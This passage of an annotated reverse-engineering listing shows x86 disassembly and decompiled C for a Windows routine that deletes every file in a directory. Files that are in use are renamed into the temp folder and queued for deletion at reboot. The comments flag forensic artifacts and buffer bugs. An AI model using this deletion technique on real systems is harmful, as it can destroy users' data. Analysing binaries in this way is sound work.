sub edx, ecx
lea esp, [esp]
.3:
movzx eax, word ptr [ecx]
mov [edx+ecx*1], ax
lea ecx, [ecx+0x02]
test ax, ax
jnz .3
lea eax, [ebp-0xAAC]                 ; &WIN32_FIND_DATAW
push eax
lea eax, [ebp-0x60C]                 ; search pattern
push eax
call [kernel32.FindFirstFileW]
mov [ebp-0xAB0], eax                 ; hFind
cmp eax, 0xFFFFFFFF
jz .13
mov edi, [kernel32.MoveFileExW]      ; edi = MoveFileExW for the loop
mov esi, ebx
lea eax, [ebp-0x40C]                 ; [ebp-0x40C] = full path buffer
sub esi, eax
.4:
movzx edx, word ptr [ebx]
lea eax, [ebp-0x40C]
jmp .5
.5:
movzx ecx, word ptr [esi+eax*1+0x02] ; copy directory path (now with trailing backslash)
mov [eax], dx
add eax, 0x02
mov edx, ecx
test cx, cx
jnz .5
lea edx, [ebp-0xA80]                 ; cFileName (offset 0x2C inside the find data)
jmp .6
.6:
movzx ecx, word ptr [edx]            ; append the entry name -> full path
mov [eax], cx
lea edx, [edx+0x02]
lea eax, [eax+0x02]
test cx, cx
jnz .6
test byte ptr [ebp-0xAAC], 0x10      ; dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY -> skip
jnz .12
lea eax, [ebp-0x85C]                 ; second find-data buffer, used only as an existence check
push eax
lea eax, [ebp-0x40C]
push eax
call [kernel32.FindFirstFileW]
cmp eax, 0xFFFFFFFF
jz .12
push eax
call [kernel32.FindClose]
lea eax, [ebp-0x40C]
push eax
call [kernel32.DeleteFileW]          ; first attempt: plain delete
test eax, eax
jnz .12
lea eax, [ebp-0x20C]                 ; temp path buffer
push eax
push 0x100
call [kernel32.GetTempPathW]
cmp word ptr [ebp-0x20C], 0x00
lea eax, [ebp-0x20C]
jz .8
lea esp, [esp]
.7:
add eax, 0x02                        ; find the terminator
cmp word ptr [eax], 0x00
jnz .7
.8:
cmp word ptr [eax-0x02], 0x5C
jz .9
mov ecx, 0x5C
mov [eax], cx                        ; writes only the backslash (a word): no new terminator is stored
.9:
lea eax, [ebp-0xAB8]                 ; FILETIME
push eax
call [kernel32.GetSystemTimeAsFileTime]
mov eax, [ebp-0xAB8]
xor eax, [ebp-0xAB4]                 ; low ^ high dword of the time -> pseudo-random name suffix
push eax
lea eax, [ebp-0x20C]
push eax
lea eax, [ebp-0x80C]
push "%s%u.tmp"                      ; "<temp>\<n>.tmp"
push eax
call [user32.wsprintfW]
add esp, 0x10
lea eax, [ebp-0x80C]
push 0x01                            ; MOVEFILE_REPLACE_EXISTING
push eax
lea eax, [ebp-0x40C]
push eax
call edi                             ; MoveFileExW(fullpath, tmpname, 1)
test eax, eax
jnz .10
mov eax, [ebp-0xAB8]
xor eax, [ebp-0xAB4]
push eax
lea eax, [ebp-0x40C]
push eax
lea eax, [ebp-0x20C]
push "%s_%u.tmp"                     ; fallback: "<fullpath>_<n>.tmp" next to the original
push eax
call [user32.wsprintfW]
add esp, 0x10
lea eax, [ebp-0x20C]
push 0x01
push eax
lea eax, [ebp-0x40C]
push eax
call edi                             ; MoveFileExW(fullpath, sidecar name, 1)
test eax, eax
jz .12
lea eax, [ebp-0x20C]
jmp .11
.10:
lea eax, [ebp-0x80C]
.11:
push 0x04                            ; MOVEFILE_DELAY_UNTIL_REBOOT
push 0x00                            ; NULL new name -> delete at next boot (PendingFileRenameOperations artifact)
push eax
call edi
.12:
lea eax, [ebp-0xAAC]
push eax
push [ebp-0xAB0]
call [kernel32.FindNextFileW]
test eax, eax
jnz .4
push [ebp-0xAB0]
call [kernel32.FindClose]
.13:
cmp byte ptr [ebp+0x08], 0x00        ; flag argument: 0 -> remove the directory too
jnz .14
push ebx
call [kernel32.RemoveDirectoryW]
.14:
mov ecx, [ebp-0x08]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_406beb()                    ; looks like the MSVC security-cookie check -- not verified here
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * sub_4025e0 -- __thiscall. param_1 ("this") is a wide-char directory path,
 * param_2 is a flag. Deletes every non-directory entry directly inside the
 * directory (no recursion; entries with FILE_ATTRIBUTE_DIRECTORY, 0x10, are
 * skipped) and, when param_2 == 0, removes the directory itself.
 *
 * Per file:
 *   1. DeleteFileW(full path).
 *   2. If that fails, MoveFileExW(path, "<temp>\<n>.tmp", 1 =
 *      MOVEFILE_REPLACE_EXISTING) where n = FILETIME low ^ high; if that
 *      also fails, rename to "<path>_<n>.tmp" beside the original.
 *   3. MoveFileExW(renamed, NULL, 4 = MOVEFILE_DELAY_UNTIL_REBOOT) so the
 *      file is deleted at next boot. This leaves a PendingFileRenameOperations
 *      entry under Session Manager, which is a useful forensic artifact.
 *
 * Side effect on the caller: when param_1 lacks a trailing backslash the first
 * loop appends one into param_1's own buffer (*puVar1 = 0x5c; the listing
 * stores a full dword there, i.e. L'\\' followed by L'\0'), so the caller's
 * string is modified in place. The search pattern appended after the path is
 * the global wide string at 0x46b3b8, whose contents are not shown here.
 */
void __thiscall sub_4025e0(undefined4 *param_1,char param_2)
{
undefined4 *puVar1;
int16_t iVar2;
code *pcVar3;
int32_t iVar4;
int16_t *piVar5;
int16_t iVar6;
undefined2 *puVar7;
undefined2 *puVar8;
int16_t *piVar9;
undefined4 *puVar10;
uint32_t uStack_abc;            /* FILETIME.dwLowDateTime */
uint32_t uStack_ab8;            /* FILETIME.dwHighDateTime */
int32_t iStack_ab4;             /* hFind for the directory enumeration */
uint8_t auStack_ab0 [44];       /* WIN32_FIND_DATAW header; [0] holds dwFileAttributes */
int16_t aiStack_a84 [274];      /* WIN32_FIND_DATAW.cFileName (+ cAlternateFileName) at offset 44 */
undefined auStack_860 [80];     /* second find-data buffer, used only as an existence check */
int16_t aiStack_810 [256];      /* "<temp>\<n>.tmp" */
undefined2 auStack_610 [256];   /* directory path + search pattern */
int16_t aiStack_410 [256];      /* full path of the current entry */
int16_t iStack_210;             /* temp path buffer (continues into aiStack_20e) */
int16_t aiStack_20e [257];
uint32_t uStack_c;
uStack_c = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
puVar8 = auStack_610;
puVar1 = param_1;
/* Copy the directory path into the local pattern buffer. */
do {
puVar10 = puVar1;
puVar7 = puVar8;
puVar1 = puVar10 + 2;
*puVar7 = *puVar10;
puVar8 = puVar7 + 1;
} while (*puVar1 != 0);
if (*puVar10 != 0x5c) {
*puVar8 = 0x5c;
*puVar1 = 0x5c;   /* written into the caller's buffer, not just the local copy */
puVar8 = puVar7 + 2;
}
/* Append the global wide string at 0x46b3b8 (search pattern); the odd
 * pointer arithmetic is the decompiler's rendering of dst = puVar8 + (src - 0x46b3b8). */
piVar5 = 0x46b3b8;
do {
iVar6 = *piVar5;
*(puVar8 + -0x2359dc + piVar5) = iVar6;
piVar5 = piVar5 + 1;
} while (iVar6 != 0);
iStack_ab4 = (*kernel32.FindFirstFileW)(auStack_610, auStack_ab0);
pcVar3 = kernel32.MoveFileExW;
if (iStack_ab4 != -1) {
do {
/* Build aiStack_410 = param_1 (now backslash-terminated) + cFileName. */
piVar5 = aiStack_410;
iVar6 = *param_1;
do {
iVar2 = *(param_1 + (2 - aiStack_410) + piVar5);
*piVar5 = iVar6;
piVar5 = piVar5 + 1;
iVar6 = iVar2;
} while (iVar2 != 0);
piVar9 = aiStack_a84;
do {
iVar6 = *piVar9;
*piVar5 = iVar6;
piVar9 = piVar9 + 1;
piVar5 = piVar5 + 1;
} while (iVar6 != 0);
/* Skip directories (0x10 = FILE_ATTRIBUTE_DIRECTORY); the FindFirstFileW on
 * the full path is only an existence check, its data is never read. */
if (((auStack_ab0[0] & 0x10) == 0) &&
(iVar4 = (*kernel32.FindFirstFileW)(aiStack_410, auStack_860), iVar4 != -1)) {
(*kernel32.FindClose)(iVar4);
iVar4 = (*kernel32.DeleteFileW)(aiStack_410);
if (iVar4 == 0) {
/* Delete failed (e.g. file in use): rename it away and defer deletion to reboot. */
(*kernel32.GetTempPathW)(0x100, &iStack_210);
piVar5 = &iStack_210;
iVar6 = iStack_210;
while (iVar6 != 0) {
piVar5 = piVar5 + 1;
iVar6 = *piVar5;
}
if (piVar5[-1] != 0x5c) {
*piVar5 = 0x5c;   /* overwrites the terminator; no new L'\0' is stored afterwards */
}
(*kernel32.GetSystemTimeAsFileTime)(&uStack_abc);
/* low ^ high dword of the current FILETIME serves as a pseudo-random name suffix */
(*user32.wsprintfW)(aiStack_810, "%s%u.tmp", &iStack_210, uStack_abc ^ uStack_ab8);
iVar4 = (*pcVar3)(aiStack_410, aiStack_810, 1);   /* MOVEFILE_REPLACE_EXISTING */
if (iVar4 == 0) {
/* Fallback: rename beside the original. The full path plus suffix is formatted
 * into the 258-wchar temp buffer, which could overrun for long paths. */
(*user32.wsprintfW)(&iStack_210, "%s_%u.tmp", aiStack_410, uStack_abc ^ uStack_ab8);
iVar4 = (*pcVar3)(aiStack_410, &iStack_210, 1);
if (iVar4 == 0) goto code_r0x004027d8;
piVar5 = &iStack_210;
}
else {
piVar5 = aiStack_810;
}
/* MoveFileExW(renamed, NULL, MOVEFILE_DELAY_UNTIL_REBOOT): delete at next boot. */
(*pcVar3)(piVar5, 0, 4);
}
}
code_r0x004027d8:
iVar4 = (*kernel32.FindNextFileW)(iStack_ab4, auStack_ab0);
} while (iVar4 != 0);
(*kernel32.FindClose)(iStack_ab4);
}
if (param_2 == '\0') {
(*kernel32.RemoveDirectoryW)(param_1);
}
sub_406beb();
return;
}
| Library | Functions |
|---|---|
| runtime/other | 151 |